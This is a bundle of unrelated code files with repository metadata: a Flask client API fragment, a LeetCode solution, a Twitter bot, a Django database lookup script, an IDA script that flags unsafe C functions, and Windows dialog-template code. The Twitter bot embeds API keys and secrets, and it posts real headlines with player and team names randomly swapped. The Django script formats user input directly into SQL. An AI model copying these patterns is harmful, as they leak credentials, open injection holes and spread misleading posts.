client = abort_if_obj_doesnt_exist('name', target_client, Client)
# TODO: Validate email field
self.parser.add_argument('email', type=str)
self.parser.add_argument('phone', type=str)
self.parser.add_argument('company', type=str)
self.parser.add_argument('reseller_name', type=str)
reqdata = self.parser.parse_args()
# Check if the user belongs to the reseller
client.email = reqdata.get('email') or client.email
client.phone = reqdata.get('phone') or client.phone
client.company = reqdata.get('company') or client.company
print client.email, client.phone, client.company
if reqdata.get('reseller_name'):
if not self.is_global_admin:
abort(403, message = 'Permission denied! Does not have enough permissions.')
newreseller = Reseller.query.filter_by(name = reqdata.get('reseller_name')).first()
else:
newreseller = Reseller.query.filter_by(name = target_reseller).first()
client.reseller_id = newreseller.id
db.session.commit()
return '', 204
def post(self, target_reseller, target_client):
target_client = target_client.lower()
reseller = abort_if_obj_doesnt_exist('name', target_reseller, Reseller)
if Client.query.filter_by(name=target_client).first():
abort(409, message='The client {} already exists'.format(target_client))
#sleep(2)
# TODO: Validate email field
self.parser.add_argument('email', type=str, required=True, case_sensitive=True)
self.parser.add_argument('login_name', type=str)
self.parser.add_argument('login', type=str, case_sensitive=True)
self.parser.add_argument('password', type=str)
self.parser.add_argument('company', type=str, required=True)
self.parser.add_argument('enable_api', type=bool, default=False)
self.parser.add_argument('admin', type=bool, default=False)
reqdata = self.parser.parse_args()
# Check if the user belongs to the reseller
client = Client(
reseller_id = reseller.id,
name = target_client,
email = reqdata['email'],
company = reqdata['company']
)
if reqdata['login'] and reqdata['login_name'] and reqdata['password']:
user = User(login = reqdata['login'],
name = reqdata['login_name'],
email = reqdata['email'],
password = Security.hash_password(reqdata['password']),
api_enabled = reqdata['enable_api'],
admin = reqdata['admin']
)
client.user = [user]
db.session.add(client)
db.session.commit()
client = Client.query.filter_by(name=target_client).one()
return {
'response' : {
'client_id' : client.id
}
}, 201 | apache-2.0 | -3,406,313,545,690,063,400 | 34.154028 | 112 | 0.649656 | false |
kingdaa/LC-python | lc/842_Split_Array_into_Fibonacci_Sequence.py | 1 | 2475 | # 842. Split Array into Fibonacci Sequence
# Difficulty: Medium
# Given a string S of digits, such as S = "123456579", we can split it into a
# Fibonacci-like sequence [123, 456, 579].
#
# Formally, a Fibonacci-like sequence is a list F of non-negative integers
# such that:
#
# 0 <= F[i] <= 2^31 - 1, (that is, each integer fits a 32-bit signed integer
# type);
# F.length >= 3;
# and F[i] + F[i+1] = F[i+2] for all 0 <= i < F.length - 2.
# Also, note that when splitting the string into pieces, each piece must not
# have extra leading zeroes, except if the piece is the number 0 itself.
#
# Return any Fibonacci-like sequence split from S, or return [] if it cannot
# be done.
#
# Example 1:
#
# Input: "123456579"
# Output: [123,456,579]
# Example 2:
#
# Input: "11235813"
# Output: [1,1,2,3,5,8,13]
# Example 3:
#
# Input: "112358130"
# Output: []
# Explanation: The task is impossible.
# Example 4:
#
# Input: "0123"
# Output: []
# Explanation: Leading zeroes are not allowed, so "01", "2", "3" is not valid.
# Example 5:
#
# Input: "1101111"
# Output: [110, 1, 111]
# Explanation: The output [11, 0, 11, 11] would also be accepted.
# Note:
#
# 1 <= S.length <= 200
# S contains only digits.
class Solution:
def splitIntoFibonacci(self, S):
"""
:type S: str
:rtype: List[int]
"""
INT_MAX = 2 ** 31 - 1
def dfs(S, index, path):
if index == len(S) and len(path) >= 3:
return True
for i in range(index, len(S)):
if S[index] == "0" and i > index:
break
num = int(S[index:i + 1])
if num > INT_MAX:
break
l = len(path)
if l >= 2 and num > path[l - 1] + path[l - 2]:
break
if len(path) < 2 or (
num == path[l - 1] + path[l - 2]):
path.append(num)
if dfs(S, i + 1, path):
return True
path.pop()
return False
res = []
dfs(S, 0, res)
return res
if __name__ == '__main__':
s1 = "123456579"
s2 = "11235813"
s3 = "112358130"
s4 = "0123"
s5 = "1101111"
sol = Solution()
print(sol.splitIntoFibonacci(s1))
print(sol.splitIntoFibonacci(s2))
print(sol.splitIntoFibonacci(s3))
print(sol.splitIntoFibonacci(s4))
print(sol.splitIntoFibonacci(s5))
| mit | 6,509,765,307,642,917,000 | 25.902174 | 78 | 0.532929 | false |
mattmelachrinos/Creative-Programming | MelachrinosMatthew_Bot/TwitterBot.py | 1 | 2392 | import random
import twitter
import json
players = []
teams = []
with open('player_names','r') as player_file:
for player in player_file:
players.append(player)
with open('football_teams','r') as teams_file:
for team in teams_file:
teams.append(team)
random_team = random.choice(teams)
random_player = random.choice(players)
#Keys and Tokens
Consumer_Key = "MsB3P0A9c8DPsbLYCyEVcmAA9"
Consumer_Secret = "gstX2eUuBOte0Zpow8mHPLujt7r5yRndzgLMq4ofV1ASLPiR4O"
Access_Token = "851599589878771712-AAB4jMmz8RoZRm08rVH8WNKISc4kuJe"
Access_Token_Secret = "uACJNnJYF5fG12KcUesPXSDHMwZiKfABdTnkKSVFNYo6N"
# connect to Twitter with our OAuth settings
api = twitter.Api(consumer_key = Consumer_Key, consumer_secret = Consumer_Secret, access_token_key = Access_Token, access_token_secret = Access_Token_Secret)
#Twitter Query
query = "https://api.twitter.com/1.1/search/tweets.json?q=%nfl&since_id=24012619984051000&result_type=mixed&count=15"
def generate_tweet(text):
for team in teams:
if team.strip() in text:
index = text.find(team.strip())
text = text[:index] + random_team.strip() + text[index+len(team)-1:]
break
for player in players:
if player.strip() in text:
index = text.find(player.strip())
text = text[:index] + random_player.strip() + text[index+len(player)-1:]
break
return text
def main():
# search_results = api.GetSearch(raw_query="q=nfl%20&result_type=recent&since=2014-07-19&count=1")
# print search_results
# search_results = json.dumps(search_results)
# tweet_list = []
# for line in search_results:
# tweet_list.append(json.loads(line))
#
# print tweet_list
incoming_tweet = '''Seahawks GM says team has listened to trade offers regarding cornerback Richard Sherman http://apne.ws/2nKxQda'''
tweet = generate_tweet(incoming_tweet)
if len(tweet) > 140:
tweet = tweet[:140]
try:
status = api.PostUpdate(tweet) # try posting
print '- success!'
with open("Tweets.txt","a") as tweets_file:
tweets_file.write("\n")
tweets_file.write(incoming_tweet + "\n")
tweets_file.write(tweet + "\n")
except twitter.TwitterError, e: # if an error, let us know
print '- error posting!'
print e
if __name__ == "__main__":
main()
| mit | -2,408,954,984,201,946,600 | 30.893333 | 157 | 0.661371 | false |
carthagecollege/django-djdoop | djdoop/bin/get_ens.py | 1 | 1541 | # -*- coding: utf-8 -*-
import os, sys
# env
sys.path.append('/usr/local/lib/python2.7/dist-packages/')
sys.path.append('/usr/lib/python2.7/dist-packages/')
sys.path.append('/usr/lib/python2.7/')
sys.path.append('/data2/django_projects/')
sys.path.append('/data2/django_third/')
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "djdoop.settings")
from djzbar.utils.informix import do_sql
from optparse import OptionParser
"""
Fetch data from a MSSQL database
"""
# set up command-line options
desc = """
Accepts as input a college ID
"""
parser = OptionParser(description=desc)
parser.add_option(
"-i", "--cid",
help="Please provide a college ID.",
dest="cid"
)
FIELDS = ['aa','beg_date','end_date','line1','line2','line3',
'phone','phone_ext','cell_carrier','opt_out']
CODES = ['MIS1','MIS2','ICE','ICE2','ENS']
def main():
"""
main method
"""
for c in CODES:
print "++%s++++++++++++++++++++++" % c
sql = "SELECT * FROM aa_rec WHERE aa = '%s' AND id='%s'" % (c,cid)
result = do_sql(sql).fetchone()
for f in FIELDS:
if result[f]:
print "%s = %s" % (f,result[f])
######################
# shell command line
######################
if __name__ == "__main__":
(options, args) = parser.parse_args()
cid = options.cid
mandatories = ['cid',]
for m in mandatories:
if not options.__dict__[m]:
print "mandatory option is missing: %s\n" % m
parser.print_help()
exit(-1)
sys.exit(main())
| bsd-3-clause | -1,375,509,877,524,543,000 | 23.078125 | 74 | 0.565217 | false |
jackcrowe/bike-tools | bikesizecalculator.py | 1 | 1881 | """
bikesizecalculator:: a module for calculating the bike size appropriate for a person.
"""
from math import *
# globals to store categorization of bike types
mountain_geometry = "MTN"
road_geometry = "ROAD"
stepthrough_geometry = "STEP"
# dictionary for bike type to geometry categorization
bike_type_categories = {
'Touring' : road_geometry,
'Commuter' : road_geometry,
'Track' : road_geometry,
'Road' : road_geometry,
'Mixte' : stepthrough_geometry,
'Hardtail' : mountain_geometry,
'XC' : mountain_geometry }
""" calculates the correct bike size for the given bike type and person's height"""
def calculate_bike_size(bike_type, inseam):
category = get_geometry_categorization(bike_type)
if category == road_geometry:
return get_road_size(inseam)
else:
return get_mountain_size(inseam)
""" generates a craigslist query given an array of bike types and a person's height"""
def generate_craigslist_query(bike_types, inseam):
if len(bike_types) == 0:
return ''
query = ''
for bike_type in bike_types:
bike_size = int(calculate_bike_size(bike_type, inseam))
query += '"'+bike_type+' '+str(bike_size)+'"|'
location = 'http://chicago.craigslist.org/'
category = 'bik'
search_type = 'T'
search_url = '%ssearch/%s?query=%s&srchType=%s' % (
location, category, query, search_type)
return search_url
""" looks up the category of geometry for a bike type """
def get_geometry_categorization(bike_type):
return bike_type_categories[bike_type]
""" returns the appropriate road bike size for a person of the given height """
def get_road_size(inseam):
return floor(1.72*float(inseam) - 0.68)
""" returns the appropriate mountain bike size for a person of the given height """
def get_mountain_size(inseam):
return inseam-10
| apache-2.0 | 5,846,033,641,118,190,000 | 32.607143 | 86 | 0.672515 | false |
WinHeapExplorer/WinHeap-Explorer | IDAscripts/dll_parser.py | 1 | 11768 | '''
BSD 2-Clause License
Copyright (c) 2013-2016,
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.s
*/
'''
''' This script is used to perform system dlls parsing to get a list of potentially
dangerous library calls and their instructions
'''
import os
import sys
import idc
import idaapi
import idautils
from time import strftime
''' banned functions MSDN SDLC '''
list_of_banned_functions = ["strcpy", "strcpyA", "strcpyW", "wcscpy", "_tcscpy",\
"_mbscpy", "StrCpy", "StrCpyA", "StrCpyW", "lstrcpy", "lstrcpyA",\
"lstrcpyW", "_tccpy", "_mbccpy", "_ftcscpy", "strncpy", "wcsncpy",\
"_tcsncpy", "_mbsncpy", "_mbsnbcpy", "StrCpyN", "StrCpyNA", \
"StrCpyNW", "StrNCpy", "strcpynA", "StrNCpyA", "StrNCpyW", \
"lstrcpyn", "lstrcpynA", "lstrcpynW"]
list_of_banned_functions += ["strcat", "strcatA", "strcatW", "wcscat", "_tcscat", \
"_mbscat", "StrCat", "StrCatA", "StrCatW", "lstrcat", \
"lstrcatA", "lstrcatW", "StrCatBuff", "StrCatBuffA", \
"StrCatBuffW", "StrCatChainW", "_tccat", "_mbccat", \
"_ftcscat", "strncat", "wcsncat", "_tcsncat", "_mbsncat",\
"_mbsnbcat", "StrCatN", "StrCatNA", "StrCatNW", "StrNCat", \
"StrNCatA", "StrNCatW", "lstrncat", "lstrcatnA", \
"lstrcatnW", "lstrcatn"]
list_of_banned_functions += ["sprintfW", "sprintfA", "wsprintf", "wsprintfW", \
"wsprintfA", "sprintf", "swprintf", "_stprintf", \
"wvsprintf", "wvsprintfA", "wvsprintfW", "vsprintf", \
"_vstprintf", "vswprintf"]
list_of_banned_functions += ["wvsprintf", "wvsprintfA", "wvsprintfW", "vsprintf", \
"_vstprintf", "vswprintf"]
list_of_banned_functions += ["_fstrncpy", " _fstrncat", "gets", "_getts", "_gettws"]
list_of_banned_functions += ["IsBadWritePtr", "IsBadHugeWritePtr", "IsBadReadPtr", \
"IsBadHugeReadPtr", "IsBadCodePtr", "IsBadStringPtr"]
list_of_banned_functions += ["memcpy", "RtlCopyMemory", "CopyMemory", "wmemcpy"]
''' not recommended functions MSDN SDLC '''
list_of_not_recommended_functions = ["scanf", "wscanf", "_tscanf", "sscanf", "swscanf", \
"_stscanf"]
list_of_not_recommended_functions += ["wnsprintf", "wnsprintfA", "wnsprintfW", \
"_snwprintf", "snprintf", "sntprintf _vsnprintf", \
"vsnprintf", "_vsnwprintf", "_vsntprintf", \
"wvnsprintf", "wvnsprintfA", "wvnsprintfW"]
list_of_not_recommended_functions += ["_snwprintf", "_snprintf", "_sntprintf", "nsprintf"]
list_of_not_recommended_functions += ["_vsnprintf", "_vsnwprintf", "_vsntprintf", \
"wvnsprintf", "wvnsprintfA", "wvnsprintfW"]
list_of_not_recommended_functions += ["strtok", "_tcstok", "wcstok", "_mbstok"]
list_of_not_recommended_functions += ["makepath", "_tmakepath", "_makepath", "_wmakepath"]
list_of_not_recommended_functions += ["_splitpath", "_tsplitpath", "_wsplitpath"]
list_of_not_recommended_functions += ["snscanf", "snwscanf", "_sntscanf"]
list_of_not_recommended_functions += ["_itoa", "_itow", "_i64toa", "_i64tow", \
"_ui64toa", "_ui64tot", "_ui64tow", "_ultoa", \
"_ultot", "_ultow"]
list_of_not_recommended_functions += ["CharToOem", "CharToOemA", "CharToOemW", \
"OemToChar", "OemToCharA", "OemToCharW", \
"CharToOemBuffA", "CharToOemBuffW"]
list_of_not_recommended_functions += ["alloca", "_alloca"]
list_of_not_recommended_functions += ["strlen", "wcslen", "_mbslen", "_mbstrlen", \
"StrLen", "lstrlen"]
list_of_not_recommended_functions += ["ChangeWindowMessageFilter"]
WINHE_RESULTS_DIR = None
def enumerate_function_chunks(f_start):
'''
The function gets a list of chunks for the function.
@f_start - first address of the function
@return - list of chunks
'''
# Enumerate all chunks in the function
chunks = list()
first_chunk = idc.FirstFuncFchunk(f_start)
chunks.append((first_chunk, idc.GetFchunkAttr(first_chunk, idc.FUNCATTR_END)))
next_chunk = first_chunk
while next_chunk != 0xffffffffL:
next_chunk = idc.NextFuncFchunk(f_start, next_chunk)
if next_chunk != 0xffffffffL:
chunks.append((next_chunk, idc.GetFchunkAttr(next_chunk, idc.FUNCATTR_END)))
return chunks
def get_list_of_function_instr(addr):
'''
The function returns a list of instructions from a function
@addr - is function entry point
@return - list of instruction's addresses
'''
f_start = addr
f_end = idc.FindFuncEnd(addr)
chunks = enumerate_function_chunks(f_start)
list_of_addr = list()
image_base = idaapi.get_imagebase(addr)
for chunk in chunks:
for head in idautils.Heads(chunk[0], chunk[1]):
# If the element is an instruction
if head == hex(0xffffffffL):
raise Exception("Invalid head for parsing")
if idc.isCode(idc.GetFlags(head)):
head = head - image_base
head = str(hex(head))
head = head.replace("L", "")
head = head.replace("0x", "")
list_of_addr.append(head)
return list_of_addr
def enumerate_function_names():
'''
The function enumerates all functions in a dll.
@return - dictionary {function_name : list of corresponded instructions}
'''
func_name = dict()
for seg_ea in idautils.Segments():
# For each of the functions
function_ea = seg_ea
while function_ea != 0xffffffffL:
function_name = idc.GetFunctionName(function_ea)
# if already analyzed
if func_name.get(function_name, None) != None:
function_ea = idc.NextFunction(function_ea)
continue
image_base = idaapi.get_imagebase(function_ea)
addr = function_ea - image_base
addr = str(hex(addr))
addr = addr.replace("L", "")
addr = addr.replace("0x", "")
func_name[function_name] = get_list_of_function_instr(function_ea)
function_ea = idc.NextFunction(function_ea)
return func_name
def search_dangerous_functions():
''' The function searches for all potentially dangerous library calls in a module
@ return - tuple<a list of instructions from a list of potentially dangerous libcalls,
a list of potentially dangerous libcalls found in a module
'''
global list_of_banned_functions, list_of_not_recommended_functions
''' key - name, value - list of (instructions - module offset) '''
func_names = dict()
list_of_instrs = list()
list_of_func_names = list()
func_names = enumerate_function_names()
for banned_function in list_of_banned_functions:
if banned_function in func_names:
list_of_instrs.append(func_names[banned_function])
print 'Found banned function ', banned_function
list_of_func_names.append(banned_function)
continue
elif ("_" + banned_function) in func_names:
list_of_instrs.append(func_names["_" + banned_function])
print 'Found banned function ', "_" + banned_function
list_of_func_names.append("_" + banned_function)
continue
for not_recommended_func in list_of_not_recommended_functions:
if not_recommended_func in func_names:
list_of_instrs.append(func_names[not_recommended_func])
print 'Found not recommended function ', not_recommended_func
list_of_func_names.append(not_recommended_func)
continue
elif ("_" + not_recommended_func) in func_names:
list_of_instrs.append(func_names["_" + not_recommended_func])
print 'Found not recommended function ', "_" + not_recommended_func
list_of_func_names.append("_" + not_recommended_func)
continue
return list_of_instrs,list_of_func_names
def get_unique(lists_of_instr):
''' The function returns a list of unique instructions from the list of instructions
@list_of_instr - a list of instructions
@return a list of unique instructions
'''
result_list = list()
for list_of_instr in lists_of_instr:
for instr in list_of_instr:
if instr not in result_list:
result_list.append(instr)
return result_list
def save_results(lists_of_instr, list_of_func_names):
''' The function saves results in a file
@list_of_instr - a list of instructions to save_results
@list_of_func_name - a list of functions names to save
'''
one_file = "sysdlls_instr_to_instrument.txt"
analyzed_file = idc.GetInputFile()
analyzed_file = analyzed_file.replace(".","_")
current_time = strftime("%Y-%m-%d_%H-%M-%S")
file_name = WINHE_RESULTS_DIR + "\\" + one_file
file_log = WINHE_RESULTS_DIR + "\\" + analyzed_file + "_" + current_time + ".txt"
file = open(file_name, 'a')
log = open(file_log, 'w')
analyzed_file = analyzed_file.lower()
list_of_instr = get_unique(lists_of_instr)
for instr in list_of_instr:
file.write(idaapi.get_input_file_path().lower() + "!" + str(instr) + "\n")
log.write(str(len(list_of_func_names)) + "\n")
for name in list_of_func_names:
log.write(name + "\n")
file.close()
log.close()
def init_analysis():
results = search_dangerous_functions()
save_results(results[0], results[1])
def main():
global WINHE_RESULTS_DIR
print "Start analysis"
idc.Wait() #wait while ida finish analysis
DEPTH_LEVEL = os.getenv('DEPTH_LEVEL')
auto_mode = 0
# set WINHE_RESULTS_DIR variable in the cmd in case if you want to run IDA in the
# silent mode.
WINHE_RESULTS_DIR = os.getenv('WINHE_RESULTS_DIR')
if WINHE_RESULTS_DIR == None:
WINHE_RESULTS_DIR = os.getcwd()
else:
auto_mode = 1
print "saving results in ", WINHE_RESULTS_DIR
init_analysis()
if auto_mode == 1:
Exit(0)
if __name__ == "__main__":
main()
| bsd-2-clause | -7,655,870,875,429,818,000 | 44.612403 | 91 | 0.611404 | false |
Answeror/lit | pywingui/dialog.py | 1 | 14777 | ## Copyright (c) 2003 Henk Punt
## Permission is hereby granted, free of charge, to any person obtaining
## a copy of this software and associated documentation files (the
## "Software"), to deal in the Software without restriction, including
## without limitation the rights to use, copy, modify, merge, publish,
## distribute, sublicense, and/or sell copies of the Software, and to
## permit persons to whom the Software is furnished to do so, subject to
## the following conditions:
## The above copyright notice and this permission notice shall be
## included in all copies or substantial portions of the Software.
## THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
## EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
## MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
## NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
## LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
## OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
## WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE
## Thanx to Brad Clements for this contribution!
from .version_microsoft import WINVER
from types import IntType, LongType
from ctypes import *
from .windows import *
from .wtl_core import *
from .comctl import *
memcpy = cdll.msvcrt.memcpy
# Dialog Box Template Styles
DS_ABSALIGN = 0x01
DS_SYSMODAL = 0x02
DS_LOCALEDIT = 0x20 # Edit items get Local storage
DS_SETFONT = 0x40 # User specified font for Dlg controls
DS_MODALFRAME = 0x80 # Can be combined with WS_CAPTION
DS_NOIDLEMSG = 0x100 # WM_ENTERIDLE message will not be sent
DS_SETFOREGROUND = 0x200 # not in win3.1
if WINVER >= 0x0400:
DS_3DLOOK = 0x0004
DS_FIXEDSYS = 0x0008
DS_NOFAILCREATE = 0x0010
DS_CONTROL = 0x0400
DS_CENTER = 0x0800
DS_CENTERMOUSE = 0x1000
DS_CONTEXTHELP = 0x2000
DS_SHELLFONT = DS_SETFONT | DS_FIXEDSYS
#if(_WIN32_WCE >= 0x0500)
#DS_USEPIXELS = 0x8000L
# Dialog Codes
DLGC_WANTARROWS = 0x0001 # Control wants arrow keys
DLGC_WANTTAB = 0x0002 # Control wants tab keys
DLGC_WANTALLKEYS = 0x0004 # Control wants all keys
DLGC_WANTMESSAGE = 0x0004 # Pass message to control
DLGC_HASSETSEL = 0x0008 # Understands EM_SETSEL message
DLGC_DEFPUSHBUTTON = 0x0010 # Default pushbutton
DLGC_UNDEFPUSHBUTTON = 0x0020 # Non-default pushbutton
DLGC_RADIOBUTTON = 0x0040 # Radio button
DLGC_WANTCHARS = 0x0080 # Want WM_CHAR messages
DLGC_STATIC = 0x0100 # Static item: don't include
DLGC_BUTTON = 0x2000 # Button item: can be checked
class StringOrOrd:
"""Pack up a string or ordinal"""
def __init__(self, value):
if value is None or value == "":
self.value = c_ushort(0)
elif type(value) in (IntType, LongType):
# treat as an atom
if not value:
self.value = c_ushort(0) # 0 is not a valid atom
else:
ordinaltype = c_ushort * 2
ordinal = ordinaltype(0xffff, value)
self.value = ordinal
else:
value = str(value)
mbLen = MultiByteToWideChar(CP_ACP, 0, value, -1, 0, 0)
if mbLen < 1:
raise RuntimeError("Could not determine multibyte string length for %s" % \
repr(value))
#this does not work for me:, why needed?
#if (mbLen % 2):
# mbLen += 1 # round up to next word in size
stringtype = c_ushort * mbLen
string = stringtype()
result = MultiByteToWideChar(CP_ACP, 0, value, -1, addressof(string), sizeof(string))
if result < 1:
raise RuntimeError("could not convert multibyte string %s" % repr(value))
self.value = string
def __len__(self):
return sizeof(self.value)
class DialogTemplate(WindowsObject):
__dispose__ = GlobalFree
_window_class_ = None
_window_style_ = WS_CHILD
_window_style_ex_ = 0
_class_font_size_ = 8
_class_font_name_ = "MS Sans Serif"
def __init__(self,
wclass = None, # the window class
title = "",
menu=None,
style = None,
exStyle = None,
fontSize=None,
fontName=None,
rcPos = RCDEFAULT,
orStyle = None,
orExStyle = None,
nandStyle = None,
nandExStyle = None,
items=[]):
if wclass is not None:
wclass = StringOrOrd(wclass)
else:
wclass = StringOrOrd(self._window_class_)
title = StringOrOrd(title)
menu = StringOrOrd(menu)
if style is None:
style = self._window_style_
if exStyle is None:
exStyle = self._window_style_ex_
if orStyle:
style |= orStyle
if orExStyle:
exStyle |= orExStyle
if nandStyle:
style &= ~nandStyle
if rcPos.left == CW_USEDEFAULT:
cx = 50
x = 0
else:
cx = rcPos.right
x = rcPos.left
if rcPos.top == CW_USEDEFAULT:
cy = 50
y = 0
else:
cy = rcPos.bottom
y = rcPos.top
if style & DS_SETFONT:
if fontSize is None:
fontSize = self._class_font_size_
if fontName is None:
fontName = StringOrOrd(self._class_font_name_)
else:
fontSize = None
fontName = None
header = DLGTEMPLATE()
byteCount = sizeof(header)
byteCount += len(wclass) + len(title) + len(menu)
if fontName or fontSize:
byteCount += 2 + len(fontName)
d, rem = divmod(byteCount, 4) # align on dword
byteCount += rem
itemOffset = byteCount # remember this for later
for i in items:
byteCount += len(i)
valuetype = c_ubyte * byteCount
value = valuetype()
header = DLGTEMPLATE.from_address(addressof(value))
# header is overlayed on value
header.exStyle = exStyle
header.style = style
header.cDlgItems = len(items)
header.x = x
header.y = y
header.cx = cx
header.cy = cy
offset = sizeof(header)
# now, memcpy over the menu
memcpy(addressof(value)+offset, addressof(menu.value), len(menu)) # len really returns sizeof menu.value
offset += len(menu)
# and the window class
memcpy(addressof(value)+offset, addressof(wclass.value), len(wclass)) # len really returns sizeof wclass.value
offset += len(wclass)
# now copy the title
memcpy(addressof(value)+offset, addressof(title.value), len(title))
offset += len(title)
if fontSize or fontName:
fsPtr = c_ushort.from_address(addressof(value)+offset)
fsPtr.value = fontSize
offset += 2
# now copy the fontname
memcpy(addressof(value)+offset, addressof(fontName.value), len(fontName))
offset += len(fontName)
# and now the items
assert offset <= itemOffset, "offset %d beyond items %d" % (offset, itemOffset)
offset = itemOffset
for item in items:
memcpy(addressof(value)+offset, addressof(item.value), len(item))
offset += len(item)
assert (offset % 4) == 0, "Offset not dword aligned for item"
self.m_handle = GlobalAlloc(0, sizeof(value))
memcpy(self.m_handle, addressof(value), sizeof(value))
self.value = value
def __len__(self):
return sizeof(self.value)
class DialogItemTemplate(object):
_window_class_ = None
_window_style_ = WS_CHILD|WS_VISIBLE
_window_style_ex_ = 0
def __init__(self,
wclass = None, # the window class
id = 0, # the control id
title = "",
style = None,
exStyle = None,
rcPos = RCDEFAULT,
orStyle = None,
orExStyle = None,
nandStyle = None,
nandExStyle = None):
if not self._window_class_ and not wclass:
raise ValueError("A window class must be specified")
if wclass is not None:
wclass = StringOrOrd(wclass)
else:
wclass = StringOrOrd(self._window_class_)
title = StringOrOrd(title)
if style is None:
style = self._window_style_
if exStyle is None:
exStyle = self._window_style_ex_
if orStyle:
style |= orStyle
if orExStyle:
exStyle |= orExStyle
if nandStyle:
style &= ~nandStyle
if rcPos.left == CW_USEDEFAULT:
cx = 50
x = 0
else:
cx = rcPos.right
x = rcPos.left
if rcPos.top == CW_USEDEFAULT:
cy = 50
y = 0
else:
cy = rcPos.bottom
y = rcPos.top
header = DLGITEMTEMPLATE()
byteCount = sizeof(header)
byteCount += 2 # two bytes for extraCount
byteCount += len(wclass) + len(title)
d, rem = divmod(byteCount, 4)
byteCount += rem # must be a dword multiple
valuetype = c_ubyte * byteCount
value = valuetype()
header = DLGITEMTEMPLATE.from_address(addressof(value))
# header is overlayed on value
header.exStyle = exStyle
header.style = style
header.x = x
header.y = y
header.cx = cx
header.cy = cy
header.id = id
# now, memcpy over the window class
offset = sizeof(header)
memcpy(addressof(value)+offset, addressof(wclass.value), len(wclass))
# len really returns sizeof wclass.value
offset += len(wclass)
# now copy the title
memcpy(addressof(value)+offset, addressof(title.value), len(title))
offset += len(title)
extraCount = c_ushort.from_address(addressof(value)+offset)
extraCount.value = 0
self.value = value
def __len__(self):
return sizeof(self.value)
PUSHBUTTON = 0x80
EDITTEXT = 0x81
LTEXT = 0x82
LISTBOX = 0x83
SCROLLBAR = 0x84
COMBOBOX = 0x85
class PushButton(DialogItemTemplate):
_window_class_ = PUSHBUTTON
_window_style_ = WS_CHILD|WS_VISIBLE|WS_TABSTOP
class DefPushButton(DialogItemTemplate):
_window_class_ = PUSHBUTTON
_window_style_ = WS_CHILD|WS_VISIBLE|WS_TABSTOP|BS_DEFPUSHBUTTON
class GroupBox(DialogItemTemplate):
_window_class_ = PUSHBUTTON
_window_style_ = WS_CHILD|WS_VISIBLE|BS_GROUPBOX
class EditText(DialogItemTemplate):
_window_class_ = EDITTEXT
_window_style_ = WS_CHILD|WS_VISIBLE|WS_BORDER|WS_TABSTOP
class StaticText(DialogItemTemplate):
_window_class_ = LTEXT
_window_style_ = WS_CHILD|WS_VISIBLE|WS_GROUP
class ListBox(DialogItemTemplate):
_window_class_ = LISTBOX
_window_style_ = LBS_STANDARD
class ScrollBar(DialogItemTemplate):
_window_class_ = SCROLLBAR
_window_style_ = WS_CHILD|WS_VISIBLE|WS_TABSTOP|SBS_VERT|SBS_RIGHTALIGN
class ComboBox(DialogItemTemplate):
_window_class_ = COMBOBOX
_window_style_ = WS_VISIBLE|WS_CHILD|WS_OVERLAPPED|WS_VSCROLL|WS_TABSTOP|CBS_DROPDOWNLIST
class RadioButton(DialogItemTemplate):
_window_class_ = PUSHBUTTON
_window_style_ = WS_CHILD|WS_VISIBLE|WS_GROUP|WS_TABSTOP|BS_RADIOBUTTON
class AutoRadioButton(DialogItemTemplate):
_window_class_ = PUSHBUTTON
_window_style_ = WS_CHILD|WS_VISIBLE|WS_GROUP|WS_TABSTOP|BS_AUTORADIOBUTTON
class CheckBox(DialogItemTemplate):
_window_class_ = PUSHBUTTON
_window_style_ = WS_CHILD|WS_VISIBLE|WS_GROUP|WS_TABSTOP|BS_CHECKBOX
class AutoCheckBox(DialogItemTemplate):
_window_class_ = PUSHBUTTON
_window_style_ = WS_CHILD|WS_VISIBLE|WS_GROUP|WS_TABSTOP|BS_AUTOCHECKBOX
class Dialog(Window):
"""supports _dialog_id_ and _dialog_module_ class properties or
use _dialog_template_"""
_dialog_template_ = None
_dialog_module_ = None
_dialog_id_ = None
def __init__(self, template = None, id = None, module = None):
"""module and dlgid can be passed as parameters or be given as class properties"""
self.module = None
self.id = None
self.template = None
if template or self._dialog_template_:
self.template = template or self._dialog_template_
elif module or self._dialog_module_:
self.module = module or self._dialog_module_
self.id = id or self._dialog_id_
if self.module and type(self.module) == type(''): #module is given as path name
self.module = LoadLibrary(self.module)
self.m_handle = 0 #filled in on init dialog
def DoModal(self, parent = 0, center = 1):
self.center = center
if self.template:
return DialogBoxIndirectParam(self.module,
self.template.handle,
handle(parent),
DialogProc(self.DlgProc),
0)
else:
return DialogBoxParam(self.module, self.id, handle(parent),
DialogProc(self.DlgProc), 0)
def DlgProc(self, hwnd, uMsg, wParam, lParam):
